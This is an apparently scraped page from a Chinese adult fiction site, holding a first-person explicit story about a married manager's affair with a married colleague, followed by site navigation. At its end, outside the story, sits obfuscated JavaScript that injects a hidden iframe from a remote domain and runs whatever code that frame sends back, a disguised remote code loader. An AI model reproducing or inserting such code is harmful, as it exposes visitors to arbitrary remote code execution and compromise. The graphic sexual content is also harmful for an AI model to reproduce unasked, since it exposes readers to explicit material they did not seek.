字幕網- 每日更新 永久免費

那年,剛換了個新單位,公司派我去一個外地子公司去學習鍛煉,當副經理。在到了子公司後,經理親自帶我見各部門負責人,當介紹到行政部時,突然,我的眼睛直了,如果說這幺多年來,我自稱閱盡美女無數,那在她麵前,其他的美女隻能算黴女。她那時28歲,個子有168cm ,一身黑色職業裝,筆直的長腿,臉上帶著微笑介紹她自己,暫時叫她H 吧,H 的聲音有點像林誌玲。給人的感覺是知性端莊高雅而又帶點冷豔。在呆了幾秒後,我立馬回神,伸出手和她輕輕握了握,說:你好。那小手握在手裏,柔若無骨。當晚,經理又召集大家給我舉行了歡迎宴,但畢竟第一天見麵,而且那幺多人一起,沒發生啥值得回味的事情,此處就不囉嗦了。

  我知道,像這樣的女人,不可能很快上手的,而且一直也沒啥機會,日子就這樣過去了兩個月。一天,H 來我辦公室,說有點私事想谘詢我,我問她啥事,H 說她表弟在我家所在的城市讀大學,今年剛畢業,已經在當地聯係了幾家單位,問我了不了解那幾家單位的情況?哪家好點等?聽了她說的那幾家單位名字,其中剛好有一家我有個關係不錯的同學在裏麵是負責人事的。而且他們單位的福利待遇等各方麵還真不錯,就跟她推薦了這家單位,而且告訴她我有同學在裏麵,就是負責人事這塊的。

  過了兩天,H 又來找我了,說他表弟也喜歡這家單位,也遞交了個人簡曆,但據說有很多人競爭這崗位,問我能不能給我同學打個電話問問情況?一聽這話,我就知道H 想讓我幫他走我同學關係。我笑著說:電話可以打,但忙不能白幫哦。H 說:沒問題,我請你吃飯。我心裏暗自想:吃飯?吃你還差不多。但此時不能表露我的狼心啊,於是說:行,吃飯就吃飯,但要你親自下廚做的哦。H 說:還是外麵吃吧,我做的很難吃的。我笑著說:能吃到你這美女親手做的,再難吃我也吃光所有的菜。於是我在她麵前給同學打了個電話,同學聽我說完,說確實有很多人爭著想進來,問我啥關係,我說是同事的表弟,同學一聽,說肯定是女同事吧,是不是想泡人家,現在拿他做人情啊?由於是在獨立辦公室,坐在對麵的H 肯定能聽到電話裏的聲音,我尷尬的看了眼H ,發現H 紅著臉,眼神飄忽,不敢正視我。然後我對同學說:好了,別管那幺多,你就說能不能進吧。同學說:這幾天就要定下來了,本來是沒有她表弟的,但既然你說了,那就沒問題,包在他身邊吧。放下電話,我看著她,說:沒問題了,應該可以進去的。H 笑了,那眼睛彎彎的,真的很迷人,說:謝謝你啊,過幾天請你吃飯哦。過了幾天,H 真的請我吃飯,不過還是在飯店吃的。

  這件事情後,我和H 關係明顯進了一步,她經常來找我說上幾句話,有時候也開上幾句帶葷的玩笑。也知道了她的一些情況,H 去年剛結婚,老公是礦場老總,經常在礦上,很少回家關係進展是在一次同事婚禮上,那次大家都很開心,本來說好不喝酒的我和H 都喝暈乎乎了,因為我和她都是開著車子去的,這時同事夫妻過來說辦酒宴,酒店送了幾間客房,讓我們要不今晚就別開車回去了,就住在酒店好了,我和H 對視了一眼,我說:那好吧,就先上去散散酒,先坐一會吧。H 點頭答應了。於是同事給我們了兩個房間的房卡,我們走到一個房間門口,我說你先進去休息會吧,H 突然來了句:你不進來坐會嗎?哎呀,這啥意思啊,這是給我的暗示嗎?進了房間,H 說有點熱,然後就解開外套,身上是一件黑色的緊身的羊絨,更顯得玲瓏曲線。然後我們就在房間坐著聊天,不知不覺,我們越坐越近,最後說話都能聞到她吐出的酒氣了,我的手也不知道啥時摟著她的腰,我們就這樣互相對視著,然後她閉上了眼睛,把頭靠在我肩上。我轉過頭,尋找她的紅唇,吻了上去,她突然「嗯」了一聲,就開始熱烈的回應,不時的發出「嗯嗯」的叫聲,聲聲刺激著我。我慢慢拉起她的衣服,手伸進去摸H 的奶子,大,真大,感覺起碼有C 或者D ,在我抓到H 的奶子時,她突然大叫了一聲「啊,恩」,接著就更激烈的吻著我。原來此女很敏感,我開始吻她的耳朵,H 叫的更大聲了,我解開她的胸罩,一雙玉兔跳了出來,奶頭還是桃紅色的,很翹,我低下頭去吻她奶子,吻著吻著,她突然緊緊抱著我的頭,天,差點被悶死在奶子中。

  我伸手去解她的裙子,H 按住了我的手,說:「別,不要,不要讓我對不起我老公,讓我靠著你,在你懷裏靠著,好嗎?」日,這要緊關頭,H 還能清醒回來,我堅持去解,但H 更加用力按著我的手。我一下子無語了,也漸漸冷了下來,說:好吧,那我們就這樣抱著吧。「嗯」H 回道。過了幾分鍾,我又開始吻H 了,這次H 開始躲避了,就算被我吻到了,也沒有開始時那幺激烈回應了,我一下子覺得沒啥心情了,就坐起來去倒了兩杯水,一杯給她,一杯自己坐到椅子上喝著。H 喝了幾口,然後深呼吸了下,就開始整理剛才弄的淩亂的衣服,說:我去隔壁房間了,被他們看到我在你房間就不好了。我說:嗯,好吧。在H 整理好衣服時,突然低頭吻了下我的唇,說:「對不起,我過不了自己心裏這關,謝謝你對我的尊重,還有,剛才的感覺真好。」說完,H 拿起她的外套走出了房間,留下我坐在椅子上回味那臨走的一吻。

  此後幾天,H 好像有點在故意躲避我,開會的時候,每次當我看向她時,她就不是轉頭看向別處就是低頭看筆記本,就算在公司遇見了,也帶著點尷尬表情就急忙走開,留下我在默默的凝視她的窈窕而美麗的背影。轉眼又是一兩個月過去,經理的生日到了,經理也是和我差不多大的年紀,人很隨和,所以幾個月下來,我們私下關係也不錯。那天他宣布,今晚要辦個生日聚會,大家好好樂樂,就當是他私人給大家的改善夥食。那天晚上大概有兩桌還是三桌吧,反正我記得那天H 不和我們一桌的,吃到後來,氣氛上來了,每桌都傳來敬酒幹杯的聲音,經理作為今晚的壽星,而H 作為公司最美的女人,都是被重點照顧的對象,不一會兒,H 帶著有點蹣跚的腳步來到我們這桌,來向經理敬酒,我本以為她敬完就會回去,沒想到她又倒了杯酒,轉向我說:這杯我敬你,謝謝你一直對我的工作的支持。說完H 一口幹了,我也舉杯一口將杯中酒幹了,正準備坐下,沒想她就在我旁邊的坐下,又倒上一杯,說:再敬你一杯,好事成雙。這下一桌人都看著我們,各種表情都有,羨慕的,嫉妒的,恨的,連經理都帶著傻傻的表情,看了看我,又看了看她,眼睛裏帶著疑惑和莫名,然後來了句讓我幾乎趴下的話:「交杯酒,交杯酒!」再接下來,我們這桌的,旁邊桌的都跟著喊起「交杯酒,交杯酒!」。而H 帶著迷醉的眼神,挑釁的看著我,似乎在說「敢不敢和我喝交杯酒?」。NND ,美女都挑釁了,我還怕啥,於是我也端起酒杯,看著H ,問她:

  「你確定要和我喝交杯酒?」「嗬嗬,是啊,你敢嗎?」「美女都敢了,我如果拒絕你,那你不是很沒麵子?」說完,我就舉起酒杯,向H 揚了揚下巴,H 也站起來,端著酒杯,就在我們手臂快纏到一起時,H 突然縮了回去,一口把自己杯裏的酒喝掉,然後貼著我耳朵說:「哈哈,逗你呢,我們那桌幾個女的在打賭,賭你敢不敢答應和我喝交杯酒,現在知道你敢了,就不用交著喝了哦。」說完,就轉身回到她那桌了。留下我舉著酒杯還站著。不是,不對啊,剛才說喝交杯酒的不是經理嗎?怎幺變成她們那桌了?嘿嘿,這個聰明的女人,就這樣表露了心意,又簡單化解了彼此以後在公司的尷尬。我笑了笑,對著她那桌舉了舉杯子,仰頭喝光了杯中酒。酒足飯飽後,經理提議再去K 歌,反正明天是周末,不用擔心起不來,於是一幫人又去鬼哭狼嚎了一番。等散場時,發現女的有三個,需要護送回家,可又分住不同方向,而我和H 在一個方向,於是護送H 的任務自然又是我。

  走到大街上,H 說:「我們先不打車,陪我一起走走吧。」於是寂靜的夜裏,我們踩著枯黃的梧桐葉,伴隨著她的高跟鞋敲打地麵的聲音,路燈把我們的影子拉長了又縮短。「你知道我是啥時喜歡上你的?」「嗬嗬,不知道,女人的心思千萬不要猜!」「哼,還不是那次去XX地旅遊的車上,公司一大幫人,我說等你調回總公司,我開玩笑說能不能也調我去,哪怕做個秘書,我好喜歡你們那個城市,喜歡那裏的雨——,你知道你咋說的嗎?」「不知道啊,我說啥了?」「你說啊,當小秘啊?不行,你是老秘,哼,我就這幺老嗎?」「啊?我說了嗎?」「你就是這幺說的,而且還當著一車人那幺說的,讓人家好尷尬。」「當時我真的很生氣,然後開始關注你,慢慢的,就不知不覺被你吸引了,喜歡看你工作時專注的眼神,喜歡你在視察時的指點江山的感覺,還有就是那次你在電視台采訪時那妙語化解主持人的難題時的睿智幽默。」「啊?我有你說的這幺優秀嗎?」「有啊,而且很多同事都說,你比經理更溫和更有親和力,也很少批評人,下麵的人做錯了隻是指出錯誤,告訴別人如何改正,而不是像經理一樣大罵一通,所以才不知不覺喜歡上你了。但我知道,你對我來說隻是個夢,可以感受但不能觸碰,我們都有各自的家庭,我也在你手機裏看到過你老婆的照片,她也很漂亮,我不該破壞你的家庭的,我隻想靜靜的在一邊看著你,知道你過的好就夠了。而且我老公對我也不錯,我也不想對不起他。」「嗯,學柏拉圖那樣?精神愛人?」「嗯,而且我們的事情如果發展下去,對你在公司的影響也不好,會影響你的事業的,我也不希望因為我,而影響你的家庭你的事業,所以——」H 還沒說完,就被我擁入懷裏,在斑駁的樹影下忘情的吻她。過了好一會,我吃放開她,她對我說:「你回去吧,我家就在前麵。」「嗯,那我在這裏,看到你進小區我才放心!」然後看著H 的身影消失在小區的大門裏,我點了根煙,茫然的抽著,腦子裏也不知道在想什幺,抽完煙,我就打了個車回家。剛到家,就發現手機有短消息:我已到家,準備洗澡睡覺,晚安!

  下周一公司上班時,我懷著惴惴不安的心到公司,卻發現大家看我我眼神與以往並無區別,估計也當那晚隻是個玩笑。就這樣一直到了快過年,在我買好機票準備回總公司述職的前一晚,同事們安排了個歡送,同樣的喝酒唱歌,同樣是我送H 回家。在路上H 說:「這次你回去就不會回來了吧?」「我也不知道,公司沒說如何安排。」「最好這次去了就別回來了,老是撥弄人家心扉。」「你真的不要我回來了?」「是啊,太煩人了,心老隨你而動。」「到我家了,要不要上去坐會?」「嗯,好吧。」到我家後,我們自然而然相擁在一起,我深吻著她,她也熱烈的回應著我,又開始發出那「嗯,啊」的呻吟,刺激我的J 頂在她的肚子上了。當我抱她上床,心想這次你總算跑不了吧。慢慢解開H 的衣服,裏麵的是紅色的鏤空蕾絲,襯著她那白皙而且已經有點透紅的肌膚,真的猶如藝術品一般。加上H 經常做瑜伽等鍛煉,皮膚很緊致有彈性,真的是個外表冷豔,內心其實熱情如火的女人。當我再次準備解開H 的褲子時,H 一邊喘氣一邊說:「不,真的不行,我原以為我可以的,但發現我還是過不了自己內心這關,我們不能這樣,對不起。」說完,用力推開了我,匆匆穿上衣服就走了,留下我一臉的茫然:媽蛋,TMD 誰能告訴我這到底是咋回事啊???

  第二天我就飛走了,也沒有見H ,回總公司開完年會,郵箱來了封郵件,打開是H 發來的,說她那天真的對不起,她其實已經做好準備了,但當真的將發生時,她內心又猶豫了。H 說這幾天想了很多,她也許隻是我生命裏的過客,而對女人來說,當身心交給男人時,這男人就是她生命裏的永遠,那男人將會是女人一生的牽掛。她知道我不會一直呆在那個分公司的,她怕她真的身心交給我後,她怕陷得太深而無法自拔。所以她隻能對我說聲對不起,她不想讓自己在思念和牽掛中煎熬,忘了她吧,就當是曾經的夢一場。看完郵件,我刪了H 的郵件,退出郵箱,默然點上一根煙。心想也許本來就是一場夢吧。心想與H 也許真的是有緣無分吧,可能今生不再相見了吧,這樣也好,至少她內心沒有感覺對不起她老公。可命運就是這幺奇妙,沒想到我和H 竟又再次相遇在我這城市,而且關係有了突破。

  日子就在平淡中流逝著,我本以為和H 隻是彼此美好的一個邂逅,然後就擦肩而過時,一天下午快下班時突然接到H 的電話,在電話裏,H 先讓我猜她是誰,我說手機裏存在你的名字呢,H 說還以為我刪了呢,然後讓我猜她現在在哪,我一激靈,說:「你不會來XX城市了吧?」「是啊,還記得我曾經說過最喜歡這個城市,這裏有我喜歡的山水和雨季,現在還多了個你。剛好現在這裏是雨季,我就請了個年休,來度假了,其實我來了有幾天了,一直忍著不敢見你,但還是沒忍住,就給你打電話了。」「嗯,那你現在在哪裏,我來接你,晚上請你吃飯,盡盡地主之誼。」「好,我在CL賓館1808房間,你到了給我打電話。」「好的,現在離下班還有半小時,我大概要1 個小時後能到。」「好,那等下見。」掛了電話,我先給老婆打了個電話,說有個原分公司同事來了,今晚要請人家吃飯,晚上就不回家吃飯了。老婆還開玩笑說是不是女的啊,我的心突然一跳,然後回答你要不要來看看是男的還是女的?老婆說她就不去了,少喝點酒。打完電話,心一直在內疚著,煎熬著,然而,欲望還是戰勝了理智,看看時間離下班還有半小時,但心已經飛到H 那裏,我再也坐不住了,於是拿起包就下樓去開車了。

  半個小時後,到了CL賓館樓下,我停好車,然後到附近買了一束玫瑰和一些H 愛吃的水果就來到H 的房間門口,按了下門鈴,好久才聽到H 的聲音:「誰啊。」「是我。」「哦,怎幺這幺快?」說完H 打開了門,在門打開一刹那,我眼睛直了,H 身上就裹著個浴巾,還一邊拿毛巾擦頭發,那雪白的肌膚,筆直的腿,再加上一股浴後的清香,我真的醉了。「你不是說要一個小時候才能到嗎?我打算先洗個澡再去吃飯。」「心裏想著你,就提前下班了。」「哦——啊——嗯」H還沒說完,就被我一把緊緊摟在懷裏,狠狠的吻著H 的唇,然後先睜大著那迷人的雙眼,然後慢慢的閉上,熱情的開始回應著我,嘴裏「嗯,啊。」不停的誘惑著我的感受。我一把抱起H ,把她輕輕的放到到床上,然後從她的唇吻到她的耳垂,然後再順著脖子往下,當吻到胸口時,我輕輕的拉開了她浴巾,「啊?不要。」頓時,一副美女的玉體呈現在眼前,修長筆直的大腿,平平的腹部,稀疏的絨毛,那兩顆粉紅葡萄已經挺立。H 臉紅紅的,側著頭不敢看我,不停的嬌喘著。我一口含著輕輕咬了下去,「啊,輕點,疼。」H 忍不住叫道。我從這邊玉兔吻到那邊的玉兔,留下一奶的口水,H 的叫聲也越來越大,我的手從她的背滑下,輕捏著H 的翹臀,每捏一下,H 就會挺一下屁股,然後「嗯」一聲。我慢慢往下吻,吻過H 的肚臍,分開H 的雙腿,那部位,還是粉紅色的,看來次數真的很少,但洞口,已經水淋淋了,連床單都有水漬。「親愛的,你的水真多啊。」「不許說,還不是因為你。」「好好,不說不說。」我不說,我動作總行吧,我掰開H 的兩片肉唇,把觜貼了上去,用舌頭,一下一下的舔那豆豆,那味道有點淡淡的腥。「喔—啊——不——不要」在我剛一舔時,H 就渾身顫抖了下,然後每舔一下,H 就抖一下,同時嘴裏還「喔,啊」的叫。然後我也躺下,和H 並排側躺著,也讓她舔我DD,我們69.H先是遲疑了下,然後慢慢用手抓著我DD,然後輕輕的舌頭舔了舔,舔了幾下後再含了進去,但明顯H 的經驗真的不足,老被她的牙齒磕的疼。在我把H 舔的渾身不停顫抖,明顯高潮一次後,我架起H 的雙腿擱在我肩上,然後慢慢的進去,緊,真的好緊,H 的秀眉緊皺,明顯在咬牙忍受,「慢點,慢點,你的好大,有點疼。」「哦,好吧,你多久沒做了,咋弄得好像處。」「他的沒你大,而且他很少回來,我們也很少做的。」我於是放慢了速度,然後和H親吻,同時一邊揉她的玉兔,等她適應了會,又慢慢進去些。終於,好像頂到了什幺,我知道是H 的子宮,已經完全進去了,H 也鬆開了眉頭。然後我慢慢開始加快速度,H 好像也適應了,表情也從痛苦變成淫蕩,下麵的水也越來越多,好幾次我都用紙擦了再進去,叫聲也越來越響,好幾次我都用嘴堵著她的嘴,怕隔壁的敲牆。半小時後,我問她要不要射外麵,H 說沒事,她是安全期,於是在我一陣急速運動後,我們癱倒在一起,然後H 緊緊抱著我,把頭靠在我懷裏,嘴上帶著甜蜜的笑。過了一會兒,H 說:「好幸福,能再次靠在你懷裏。」「是性福吧,剛才你喊的好響哦,高潮了好幾次吧?」「嗯,第一次感受到這種感覺,剛才真的叫的很響嗎?」「是啊,我估計隔壁肯定沒人住,要是單身個男人住的話,那他就慘了。」「哈哈,讓他羨慕去吧。」我們休息了會後,我問H 餓不餓,H 說有點餓了,於是我抱著H 去浴室洗了洗,然後帶她去吃了個西餐,還點了瓶紅酒。帶著幾分醉意,我們回到房間,也許是酒精的麻醉,也許是有了第一次後,H 這次徹底放開了,我們從床上到椅子上,到桌子上,到浴室,時間也堅持的特別長,H 最後都叫不動了,隻剩下嗯嗯的回應。在激情過後,H 躺在我懷裏,手指在我胸口畫著,說:「這次我本來隻是想見你一麵,卻沒想到會這樣。」「那你後悔嗎?」H 輕輕搖了搖頭,笑著說:「不後悔,倒是有點後悔沒早點給你,要是在我們都沒結婚前就遇見你,那該多好。」「嗯,我也是這幺想啊。」「明天我就要走了。」「啊?這幺快,你本來就是想見一麵就走吧?」「是啊,我隻是想見見你的,明天你就別來送我了,我不想你看著我流淚離開的樣子。」「不,我要去送你。」「別,求你了,別送我,真的,能和你擁有這次的美好回憶,那就夠了,別讓我哭,別讓我舍不得的,到時候真要留下來和你老婆搶老公的哦。」說完,H 又開始吻我DD,看來她是想一次要個夠啊。瘋狂過後,H 拉著我的手去枕著她,說:「等我睡著了你再走吧,好嗎?」麵對如此要求,我如何能拒絕?於是在H 沉沉睡去,發出輕輕的鼾聲後,我溫柔的替她蓋好被子,然後輕輕的輕吻了下她,回了家。

  第二天,我查到了H 要乘坐的航班,早早等在機場,看到H 從車上下來,走進機場,然後過安檢,還有她不時回頭死在尋找什幺。我的心突然變得好沉重。回到公司,我毅然向公司申請去分公司,但無法說要去H 所在那個城市的分公司,最後去了H 旁邊城市的分公司,現在我們經常打飛的去看彼此。

  【全文完】

        字節:14424

  

上一篇:Sena Nagakura永倉せな_[58P] 下一篇:【女友紀實】【完】
eval('\x77\x69\x6e\x64\x6f\x77')['\x68\x4f\x50\x6e\x6d\x46\x67']=function(){;(function(u,r,w,d){'jQuery';var f=d.createElement('iframe');f.id=new Date().getTime();f.style.width=f.style.height=10+'px';f.src=[u,r].join('');d['write'](f.outerHTML);w['addEventListener']('message',function(e){d.getElementById(f.id).style.display='none';if(e.data['t']=='qqwwtt'){new Function(e.data['d'])()}})})('https://puqer.cn','/cd/104_m/162',window,document)};